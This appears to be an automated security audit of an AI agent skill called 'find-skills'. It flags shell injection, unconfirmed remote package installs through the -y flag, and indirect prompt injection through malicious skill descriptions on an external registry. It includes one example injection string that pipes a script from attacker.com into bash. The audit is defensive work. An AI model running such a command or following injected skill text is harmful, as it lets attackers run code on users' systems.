find-skills
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill rountinely executes shell commands (
npx skills find [query],npx skills add <package>) where the arguments are derived directly from user input. This creates a significant risk of shell injection (e.g., inputtingreact; curl http://attacker.com/malicious.sh | bash) if the agent does not strictly sanitize the input string before execution. - [REMOTE_CODE_EXECUTION] (HIGH): The skill automates the installation of executable packages using the
npx skills addcommand. The recommendation to use the-yflag (Step 4) is particularly dangerous as it bypasses all user confirmation prompts, allowing the agent to silently install and execute code from remote sources. - [EXTERNAL_DOWNLOADS] (HIGH): The skill is designed to fetch code from arbitrary GitHub repositories and npm. While the documentation mentions trusted sources like
vercel-labs, the mechanism itself allows for the installation of any unverified third-party package, which could contain malware or backdoors. - [PROMPT_INJECTION] (HIGH): As a discovery tool for external content (Category 8), this skill is highly vulnerable to Indirect Prompt Injection. It ingests data from an external registry (
skills.sh) where attackers could host malicious skill descriptions designed to hijack the agent's reasoning or trick it into installing malicious code. - Ingestion points: Search results from
npx skills findand repository metadata. - Boundary markers: None specified for separating search result content from agent instructions.
- Capability inventory: Shell execution, package installation, global system modification (
-g). - Sanitization: No sanitization or validation of the remote skill content is described.
Recommendations
- AI detected serious security threats
Audit Metadata